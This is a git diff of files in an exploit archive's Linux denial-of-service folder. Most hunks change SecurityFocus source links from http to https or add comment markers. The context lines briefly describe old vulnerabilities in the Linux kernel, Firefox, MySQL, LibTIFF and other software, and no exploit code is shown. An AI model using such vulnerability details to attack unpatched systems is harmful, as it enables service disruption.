+++ b/exploits/linux/dos/25943.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14161/info +source: https://www.securityfocus.com/bid/14161/info oftpd is prone to a remotely exploitable buffer overflow. This may be triggered by a client through an overly long argument for the USER command. diff --git a/exploits/linux/dos/26248.sh b/exploits/linux/dos/26248.sh index 5f05698a4..281444b2b 100755 --- a/exploits/linux/dos/26248.sh +++ b/exploits/linux/dos/26248.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14790/info +source: https://www.securityfocus.com/bid/14790/info The Linux kernel is prone to a denial-of-service vulnerability. The kernel is affected by a memory leak, which eventually can result in a denial of service. diff --git a/exploits/linux/dos/26249.c b/exploits/linux/dos/26249.c index f66a0bf5c..1f236d977 100644 --- a/exploits/linux/dos/26249.c +++ b/exploits/linux/dos/26249.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14796/info +// source: https://www.securityfocus.com/bid/14796/info A remote denial of service vulnerability affects Zebedee. This issue is due to a failure of the application to properly handle exceptional network requests. diff --git a/exploits/linux/dos/26251.c b/exploits/linux/dos/26251.c index f7b8fd162..b2f1f4223 100644 --- a/exploits/linux/dos/26251.c +++ b/exploits/linux/dos/26251.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14811/info +// source: https://www.securityfocus.com/bid/14811/info Snort is reported prone to a remote denial of service vulnerability. The vulnerability is reported to exist in the 'PrintTcpOptions()' function of 'log.c', and is a result of a failure to sufficiently handle malicious TCP packets. diff --git a/exploits/linux/dos/26340.c b/exploits/linux/dos/26340.c index b4325da82..fa90d9ead 100644 --- a/exploits/linux/dos/26340.c +++ b/exploits/linux/dos/26340.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15048/info +// source: https://www.securityfocus.com/bid/15048/info up-IMAPProxy is reported prone to multiple unspecified remote format-string vulnerabilities. diff --git a/exploits/linux/dos/26342.txt b/exploits/linux/dos/26342.txt index d62c3d5de..8110db467 100644 --- a/exploits/linux/dos/26342.txt +++ b/exploits/linux/dos/26342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15062/info +source: https://www.securityfocus.com/bid/15062/info WinRAR is prone to multiple remote vulnerabilities. These issues include a format string and a buffer overflow vulnerability. Successful exploitation may allow an attacker to execute arbitrary code on a vulnerable computer. diff --git a/exploits/linux/dos/26382.c b/exploits/linux/dos/26382.c index 792a2b42e..10ecc6728 100644 --- a/exploits/linux/dos/26382.c +++ b/exploits/linux/dos/26382.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/15156/info +source: https://www.securityfocus.com/bid/15156/info Linux Kernel is reported prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/26489.c b/exploits/linux/dos/26489.c index e4949867c..ce10ba2ca 100644 --- a/exploits/linux/dos/26489.c +++ b/exploits/linux/dos/26489.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/15365/info +source: https://www.securityfocus.com/bid/15365/info Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from a failure to properly unregister kernel resources when network devices are removed. diff --git a/exploits/linux/dos/26601.pl b/exploits/linux/dos/26601.pl index 25b059d7e..7b89f5d69 100755 --- a/exploits/linux/dos/26601.pl +++ b/exploits/linux/dos/26601.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15577/info +source: https://www.securityfocus.com/bid/15577/info The 'unalz' utility is prone to a buffer-overflow vulnerability. This issue is exposed when the application extracts an ALZ archive that contains a file with a long name. diff --git a/exploits/linux/dos/26648.c b/exploits/linux/dos/26648.c index 0a6447cc3..0e99ec114 100644 --- a/exploits/linux/dos/26648.c +++ b/exploits/linux/dos/26648.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/15627/info +source: https://www.securityfocus.com/bid/15627/info Linux kernel is susceptible to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/26666.c b/exploits/linux/dos/26666.c index 2a829ebd3..e05159438 100644 --- a/exploits/linux/dos/26666.c +++ b/exploits/linux/dos/26666.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15649/info +// source: https://www.securityfocus.com/bid/15649/info CenterICQ is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/26749.c b/exploits/linux/dos/26749.c index 5e998dd8c..35c76e724 100644 --- a/exploits/linux/dos/26749.c +++ b/exploits/linux/dos/26749.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/15745/info +source: https://www.securityfocus.com/bid/15745/info Linux kernel is susceptible to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/26811.c b/exploits/linux/dos/26811.c index dc6694ca4..87dfee133 100644 --- a/exploits/linux/dos/26811.c +++ b/exploits/linux/dos/26811.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/15846/info +source: https://www.securityfocus.com/bid/15846/info Linux kernel is prone to a local integer-overflow vulnerability. diff --git a/exploits/linux/dos/26915.txt b/exploits/linux/dos/26915.txt index b7c63394c..6cd7144fa 100644 --- a/exploits/linux/dos/26915.txt +++ b/exploits/linux/dos/26915.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15981/info +source: https://www.securityfocus.com/bid/15981/info Blender is susceptible to an integer-overflow vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input before using it in a memory allocation and copy operation. diff --git a/exploits/linux/dos/27031.c b/exploits/linux/dos/27031.c index 31cea98bd..5bbeff96b 100644 --- a/exploits/linux/dos/27031.c +++ b/exploits/linux/dos/27031.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/16135/info +source: https://www.securityfocus.com/bid/16135/info Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/27144.py b/exploits/linux/dos/27144.py index 01f4e6fe4..581310d41 100755 --- a/exploits/linux/dos/27144.py +++ b/exploits/linux/dos/27144.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16407/info +source: https://www.securityfocus.com/bid/16407/info CommuniGate Pro Server is prone to a remote denial-of-service vulnerability with a potential for arbitrary code execution. This issue reportedly resides in the LDAP component of the application. diff --git a/exploits/linux/dos/27145.txt b/exploits/linux/dos/27145.txt index 8fcaaab0a..44d16b23a 100644 --- a/exploits/linux/dos/27145.txt +++ b/exploits/linux/dos/27145.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16408/info +source: https://www.securityfocus.com/bid/16408/info GNOME Evolution email client is prone to a denial-of-service vulnerability when processing messages containing inline XML file attachments with excessively long strings. diff --git a/exploits/linux/dos/27246.txt b/exploits/linux/dos/27246.txt index 79c56ffd9..4279ec8a0 100644 --- a/exploits/linux/dos/27246.txt +++ b/exploits/linux/dos/27246.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16716/info +source: https://www.securityfocus.com/bid/16716/info Mozilla Thunderbird is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/27253.txt b/exploits/linux/dos/27253.txt index 6903ab9fa..32a8883b1 100644 --- a/exploits/linux/dos/27253.txt +++ b/exploits/linux/dos/27253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16741/info +source: https://www.securityfocus.com/bid/16741/info Mozilla Firefox is prone to a denial-of-service condition when parsing certain malformed HTML content. Successful exploitation will cause the browser to fail or hang. diff --git a/exploits/linux/dos/27257.html b/exploits/linux/dos/27257.html index eac4e2475..4233c0eca 100644 --- a/exploits/linux/dos/27257.html +++ b/exploits/linux/dos/27257.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16770/info +source: https://www.securityfocus.com/bid/16770/info Multiple Mozilla products are prone to a script-execution vulnerability. diff --git a/exploits/linux/dos/27425.txt b/exploits/linux/dos/27425.txt index f4fccf24c..201abe068 100644 --- a/exploits/linux/dos/27425.txt +++ b/exploits/linux/dos/27425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17126/info +source: https://www.securityfocus.com/bid/17126/info Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. diff --git a/exploits/linux/dos/27581.txt b/exploits/linux/dos/27581.txt index 028f79dd1..d583174ab 100644 --- a/exploits/linux/dos/27581.txt +++ b/exploits/linux/dos/27581.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17415/info +source: https://www.securityfocus.com/bid/17415/info The Perl Imager module is susceptible to a denial-of-service vulnerability. This issue is due to a failure of the software to properly handle unexpected image data. diff --git a/exploits/linux/dos/27635.txt b/exploits/linux/dos/27635.txt index 20030d78a..733a94c01 100644 --- a/exploits/linux/dos/27635.txt +++ b/exploits/linux/dos/27635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17499/info +source: https://www.securityfocus.com/bid/17499/info Mozilla Firefox is prone to a denial-of-service condition when parsing certain malformed HTML content. Successful exploitation will cause the browser to fail or hang. diff --git a/exploits/linux/dos/27641.txt b/exploits/linux/dos/27641.txt index b67ba005a..f387f67a2 100644 --- a/exploits/linux/dos/27641.txt +++ b/exploits/linux/dos/27641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17513/info +source: https://www.securityfocus.com/bid/17513/info Opera is prone to a buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied input before using it in a string-copy operation. diff --git a/exploits/linux/dos/27670.txt b/exploits/linux/dos/27670.txt index fc399e3f3..d728fc410 100644 --- a/exploits/linux/dos/27670.txt +++ b/exploits/linux/dos/27670.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17579/info +source: https://www.securityfocus.com/bid/17579/info The xine package is reported prone to a remote format-string vulnerability. diff --git a/exploits/linux/dos/27723.txt b/exploits/linux/dos/27723.txt index 05b837df9..fa74f792c 100644 --- a/exploits/linux/dos/27723.txt +++ b/exploits/linux/dos/27723.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17645/info +source: https://www.securityfocus.com/bid/17645/info Ruby is affected by a denial-of-service vulnerability in the WEBrick HTTP server. This issue is due to the use of blocking network operations. Ruby's implementation of XML/RPC is also affected, since it uses the vulnerable WEBrick server. diff --git a/exploits/linux/dos/27762.txt b/exploits/linux/dos/27762.txt index c218272c8..3e55ab6b8 100644 --- a/exploits/linux/dos/27762.txt +++ b/exploits/linux/dos/27762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17730/info +source: https://www.securityfocus.com/bid/17730/info LibTIFF is affected by multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/27764.txt b/exploits/linux/dos/27764.txt index 662f5d11e..f323f52c0 100644 --- a/exploits/linux/dos/27764.txt +++ b/exploits/linux/dos/27764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17732/info +source: https://www.securityfocus.com/bid/17732/info Applications using the LibTIFF library are prone to an integer-overflow vulnerability. diff --git a/exploits/linux/dos/27765.txt b/exploits/linux/dos/27765.txt index b64a5ba4f..b06df5cd4 100644 --- a/exploits/linux/dos/27765.txt +++ b/exploits/linux/dos/27765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17733/info +source: https://www.securityfocus.com/bid/17733/info Applications using the LibTIFF library are prone to a double-free vulnerability; a fix is available. diff --git a/exploits/linux/dos/27791.txt b/exploits/linux/dos/27791.txt index 39430c12a..f3f156a0f 100644 --- a/exploits/linux/dos/27791.txt +++ b/exploits/linux/dos/27791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17769/info +source: https://www.securityfocus.com/bid/17769/info The xine package is susceptible to a remote format-string vulnerability. diff --git a/exploits/linux/dos/27856.txt b/exploits/linux/dos/27856.txt index b0fc8cf9c..0ed6a81b1 100644 
--- a/exploits/linux/dos/27856.txt +++ b/exploits/linux/dos/27856.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17950/info +source: https://www.securityfocus.com/bid/17950/info GNU 'binutils' is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/27875.c b/exploits/linux/dos/27875.c index da81c395b..5a6789ecc 100644 --- a/exploits/linux/dos/27875.c +++ b/exploits/linux/dos/27875.c @@ -1,3 +1,4 @@ +/* # Exploit Title: libtiff <= 3.9.5 Integer overflow bug poc # Date: 2013/08/25 # Exploit Author: x90c @@ -18,6 +19,7 @@ attached original advisory too I want to submit the poc, sample file only http://www.x90c.org/advisories/xadv_2013001_libtiff.txt +*/ #include diff --git a/exploits/linux/dos/27903.txt b/exploits/linux/dos/27903.txt index d76c188f3..b8fb1c215 100644 --- a/exploits/linux/dos/27903.txt +++ b/exploits/linux/dos/27903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18078/info +source: https://www.securityfocus.com/bid/18078/info Dia is prone to a remote format-string vulnerability. diff --git a/exploits/linux/dos/27925.txt b/exploits/linux/dos/27925.txt index 6759e2a5b..7f4c70e46 100644 --- a/exploits/linux/dos/27925.txt +++ b/exploits/linux/dos/27925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18183/info +source: https://www.securityfocus.com/bid/18183/info The Linux kernel is prone to a local denial-of-service vulnerability. This issue is due to a flaw in the 'proc' filesystem. diff --git a/exploits/linux/dos/27981.c b/exploits/linux/dos/27981.c index 962042c75..2dd38d109 100644 --- a/exploits/linux/dos/27981.c +++ b/exploits/linux/dos/27981.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18294/info +// source: https://www.securityfocus.com/bid/18294/info The GD Graphics Library is prone to a denial-of-service vulnerability. Attackers can trigger an infinite-loop condition when the library tries to handle malformed image files. diff --git a/exploits/linux/dos/28026.txt b/exploits/linux/dos/28026.txt index 99f349494..411d190ff 100644 --- a/exploits/linux/dos/28026.txt +++ b/exploits/linux/dos/28026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18439/info +source: https://www.securityfocus.com/bid/18439/info MySQL is susceptible to a remote denial-of-service vulnerability. This issue is due to the database server's failure to properly handle unexpected input. diff --git a/exploits/linux/dos/28077.txt b/exploits/linux/dos/28077.txt index 4589227b5..07b728cc2 100644 --- a/exploits/linux/dos/28077.txt +++ b/exploits/linux/dos/28077.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18554/info +source: https://www.securityfocus.com/bid/18554/info GnuPG is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/28160.txt b/exploits/linux/dos/28160.txt index fca18bb5b..a0b36f060 100644 --- a/exploits/linux/dos/28160.txt +++ b/exploits/linux/dos/28160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18794/info +source: https://www.securityfocus.com/bid/18794/info The mpg123 application is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/28220.txt b/exploits/linux/dos/28220.txt index 9d3bbc922..1a42c7635 100644 --- a/exploits/linux/dos/28220.txt +++ b/exploits/linux/dos/28220.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18978/info +source: https://www.securityfocus.com/bid/18978/info KDE Konqueror is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/28234.txt b/exploits/linux/dos/28234.txt index 5940a9f32..9d8c13223 100644 --- a/exploits/linux/dos/28234.txt +++ b/exploits/linux/dos/28234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19032/info +source: https://www.securityfocus.com/bid/19032/info MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. diff --git a/exploits/linux/dos/28257.txt b/exploits/linux/dos/28257.txt index 6335f2ab1..99b0d43ff 100644 --- a/exploits/linux/dos/28257.txt +++ b/exploits/linux/dos/28257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19110/info +source: https://www.securityfocus.com/bid/19110/info GnuPG is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/28348.txt b/exploits/linux/dos/28348.txt index a43c3ef0a..201e73d17 100644 --- a/exploits/linux/dos/28348.txt +++ b/exploits/linux/dos/28348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19381/info +source: https://www.securityfocus.com/bid/19381/info ClamAV is prone to a heap buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/28358.txt b/exploits/linux/dos/28358.txt index d44e5b1b3..8d2403016 100644 --- a/exploits/linux/dos/28358.txt +++ b/exploits/linux/dos/28358.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19396/info +source: https://www.securityfocus.com/bid/19396/info The Linux kernel is susceptible to a remote denial-of-service vulnerability because the EXT3 filesystem code fails to properly handle unexpected conditions. diff --git a/exploits/linux/dos/28367.txt b/exploits/linux/dos/28367.txt index 33fa41316..04855fd4d 100644 --- a/exploits/linux/dos/28367.txt +++ b/exploits/linux/dos/28367.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19450/info +source: https://www.securityfocus.com/bid/19450/info AlsaPlayer is prone to multiple buffer-overflow vulnerabilities because the application fails to check the size of the data before copying it into a finite-sized internal memory buffer. diff --git a/exploits/linux/dos/28380.txt b/exploits/linux/dos/28380.txt index f7aeb1a19..dbc32a64e 100644 --- a/exploits/linux/dos/28380.txt +++ b/exploits/linux/dos/28380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19488/info +source: https://www.securityfocus.com/bid/19488/info Mozilla Firefox is prone to a remote memory-corruption vulnerability. This issue is due to a race condition that may result in double-free or other memory-corruption issues. diff --git a/exploits/linux/dos/28383.txt b/exploits/linux/dos/28383.txt index 132458158..c83efb2d7 100644 --- a/exploits/linux/dos/28383.txt +++ b/exploits/linux/dos/28383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19507/info +source: https://www.securityfocus.com/bid/19507/info ImageMagick is prone to a remote heap buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/28384.txt b/exploits/linux/dos/28384.txt index cac98c818..616692973 100644 --- a/exploits/linux/dos/28384.txt +++ b/exploits/linux/dos/28384.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19508/info +source: https://www.securityfocus.com/bid/19508/info The libmusicbrainz library is prone to multiple buffer-overflow vulnerabilities because the application fails to check the size of the data before copying it into a finite-sized internal memory buffer. diff --git a/exploits/linux/dos/28386.txt b/exploits/linux/dos/28386.txt index fc120bfb6..61d892b76 100644 --- a/exploits/linux/dos/28386.txt +++ b/exploits/linux/dos/28386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19516/info +source: https://www.securityfocus.com/bid/19516/info Linux-HA Heartbeat is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/28391.html b/exploits/linux/dos/28391.html index fe6b02e9e..9bc63d700 100644 --- a/exploits/linux/dos/28391.html +++ b/exploits/linux/dos/28391.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19534/info +source: https://www.securityfocus.com/bid/19534/info Mozilla Firefox is prone to a remote memory-corruption vulnerability because of a race condition that may result in double-free or other memory-corruption issues. diff --git a/exploits/linux/dos/28775.pl b/exploits/linux/dos/28775.pl index a6b729029..f3da3da8c 100755 --- a/exploits/linux/dos/28775.pl +++ b/exploits/linux/dos/28775.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20416/info +source: https://www.securityfocus.com/bid/20416/info ZABBIX is prone to multiple unspecified remote code-execution vulnerabilities. diff --git a/exploits/linux/dos/28816.txt b/exploits/linux/dos/28816.txt index 118c9819f..a21af948c 100644 --- a/exploits/linux/dos/28816.txt +++ b/exploits/linux/dos/28816.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20539/info +source: https://www.securityfocus.com/bid/20539/info KMail is prone to an unspecified denial-of-service vulnerability. 
diff --git a/exploits/linux/dos/28895.txt b/exploits/linux/dos/28895.txt index 579002306..fbafaa3ad 100644 --- a/exploits/linux/dos/28895.txt +++ b/exploits/linux/dos/28895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20870/info +source: https://www.securityfocus.com/bid/20870/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/28912.txt b/exploits/linux/dos/28912.txt index ab41b71e1..b4580168a 100644 --- a/exploits/linux/dos/28912.txt +++ b/exploits/linux/dos/28912.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20920/info +source: https://www.securityfocus.com/bid/20920/info The Linux kernel is prone to a local denial-of-service vulnerability. This issue affects the code that handles the ISO9660 filesystem. diff --git a/exploits/linux/dos/29296.txt b/exploits/linux/dos/29296.txt index 1d56d4724..261b33aed 100644 --- a/exploits/linux/dos/29296.txt +++ b/exploits/linux/dos/29296.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21662/info +source: https://www.securityfocus.com/bid/21662/info KDE libkhtml is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/29399.txt b/exploits/linux/dos/29399.txt index 89338191a..d3c40e856 100644 --- a/exploits/linux/dos/29399.txt +++ b/exploits/linux/dos/29399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21910/info +source: https://www.securityfocus.com/bid/21910/info Multiple PDF readers are prone to multiple remote buffer-overflow vulnerabilities because the applications fail to bounds-check user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/linux/dos/29458.txt b/exploits/linux/dos/29458.txt index 7adabfa43..db92ee502 100644 --- a/exploits/linux/dos/29458.txt +++ b/exploits/linux/dos/29458.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22054/info +source: https://www.securityfocus.com/bid/22054/info The 'libgtop2' library is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying into an insufficiently sized memory buffer. diff --git a/exploits/linux/dos/29470.txt b/exploits/linux/dos/29470.txt index de501d312..0d83ed8d3 100644 --- a/exploits/linux/dos/29470.txt +++ b/exploits/linux/dos/29470.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22073/info +source: https://www.securityfocus.com/bid/22073/info Oftpd Server is prone to a remote denial-of-service vulnerability because it mishandles unexpected user-supplied input. diff --git a/exploits/linux/dos/29473.txt b/exploits/linux/dos/29473.txt index 7cf503555..c775f385b 100644 --- a/exploits/linux/dos/29473.txt +++ b/exploits/linux/dos/29473.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22079/info +source: https://www.securityfocus.com/bid/22079/info Squid is prone to a remote denial-of-service vulnerability because the proxy server fails to handle certain FTP requests. diff --git a/exploits/linux/dos/29520.txt b/exploits/linux/dos/29520.txt index cf2765fca..e428be751 100644 --- a/exploits/linux/dos/29520.txt +++ b/exploits/linux/dos/29520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22209/info +source: https://www.securityfocus.com/bid/22209/info Applications using the gtk2 library may be prone to a denial-of-service vulnerability because the library fails to handle malformed image data. diff --git a/exploits/linux/dos/29683.txt b/exploits/linux/dos/29683.txt index da839ef56..de8eb2ba6 100644 --- a/exploits/linux/dos/29683.txt +++ b/exploits/linux/dos/29683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22737/info +source: https://www.securityfocus.com/bid/22737/info The Linux Kernel is prone to a denial-of-service vulnerability. 
diff --git a/exploits/linux/dos/29713.html b/exploits/linux/dos/29713.html index 93f14dba3..26822d021 100644 --- a/exploits/linux/dos/29713.html +++ b/exploits/linux/dos/29713.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22814/info +source: https://www.securityfocus.com/bid/22814/info KDE Konqueror is prone to a remote denial-of-service vulnerability because of an error in KDE's JavaScript implementation. diff --git a/exploits/linux/dos/29716.txt b/exploits/linux/dos/29716.txt index b2b64a64a..394f08d71 100644 --- a/exploits/linux/dos/29716.txt +++ b/exploits/linux/dos/29716.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22846/info +source: https://www.securityfocus.com/bid/22846/info SILC Server is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/linux/dos/29717.txt b/exploits/linux/dos/29717.txt index 80c3cef8c..43c9d4087 100644 --- a/exploits/linux/dos/29717.txt +++ b/exploits/linux/dos/29717.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22855/info +source: https://www.securityfocus.com/bid/22855/info Conquest is prone to multiple remotely exploitable vulnerabilities, including a stack-based buffer-overflow vulnerability and a memory-corruption vulnerability. diff --git a/exploits/linux/dos/29720.txt b/exploits/linux/dos/29720.txt index 4c0b7d6f9..e93bb3c15 100644 --- a/exploits/linux/dos/29720.txt +++ b/exploits/linux/dos/29720.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22879/info +source: https://www.securityfocus.com/bid/22879/info Mozilla Firefox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/29723.txt b/exploits/linux/dos/29723.txt index e718e7abf..2fddbc939 100644 --- a/exploits/linux/dos/29723.txt +++ b/exploits/linux/dos/29723.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22899/info +source: https://www.securityfocus.com/bid/22899/info Firefox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/29724.txt b/exploits/linux/dos/29724.txt index 149c4f3c6..d8b055b2b 100644 --- a/exploits/linux/dos/29724.txt +++ b/exploits/linux/dos/29724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22900/info +source: https://www.securityfocus.com/bid/22900/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain select statements to database metadata. diff --git a/exploits/linux/dos/29781.c b/exploits/linux/dos/29781.c index fbf6985a6..acec6df2c 100644 --- a/exploits/linux/dos/29781.c +++ b/exploits/linux/dos/29781.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/23142/info +source: https://www.securityfocus.com/bid/23142/info The Linux kernel is prone to a NULL-pointer dereference vulnerability. diff --git a/exploits/linux/dos/29809.txt b/exploits/linux/dos/29809.txt index 3db9cce29..650268816 100644 --- a/exploits/linux/dos/29809.txt +++ b/exploits/linux/dos/29809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23240/info +source: https://www.securityfocus.com/bid/23240/info PulseAudio is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/29826.txt b/exploits/linux/dos/29826.txt index 496e69f0a..4d63a63dd 100644 --- a/exploits/linux/dos/29826.txt +++ b/exploits/linux/dos/29826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23376/info +source: https://www.securityfocus.com/bid/23376/info The Linux kernel is prone to a denial-of-service vulnerability. This issue presents itself when malformed AppleTalk frames are processed. diff --git a/exploits/linux/dos/29916.c b/exploits/linux/dos/29916.c index faa0a4058..65c532093 100644 --- a/exploits/linux/dos/29916.c +++ b/exploits/linux/dos/29916.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/23677/info +source: https://www.securityfocus.com/bid/23677/info The Linux kernel is prone to a denial-of-service vulnerability. This issue presents itself when a NETLINK message is misrouted. diff --git a/exploits/linux/dos/29939.txt b/exploits/linux/dos/29939.txt index 98cbb1477..f96931b38 100644 --- a/exploits/linux/dos/29939.txt +++ b/exploits/linux/dos/29939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23741/info +source: https://www.securityfocus.com/bid/23741/info X.Org X Window System Xserver is prone to a denial-of-service vulnerabilty because the software fails to properly handle exceptional conditions. diff --git a/exploits/linux/dos/30020.txt b/exploits/linux/dos/30020.txt index b64023d3b..11d996434 100644 --- a/exploits/linux/dos/30020.txt +++ b/exploits/linux/dos/30020.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23911/info +source: https://www.securityfocus.com/bid/23911/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries. diff --git a/exploits/linux/dos/30024.txt b/exploits/linux/dos/30024.txt index c9584a5f5..5fc5efe33 100644 --- a/exploits/linux/dos/30024.txt +++ b/exploits/linux/dos/30024.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23927/info +source: https://www.securityfocus.com/bid/23927/info The libexif library is prone to an integer-overflow vulnerability because the software fails to properly ensure that integer math operations do not result in overflows. diff --git a/exploits/linux/dos/30080.c b/exploits/linux/dos/30080.c index 4e818c8b6..4a36c0249 100644 --- a/exploits/linux/dos/30080.c +++ b/exploits/linux/dos/30080.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/24134/info +source: https://www.securityfocus.com/bid/24134/info The Linux Kernel is prone to a denial-of-service vulnerability. 
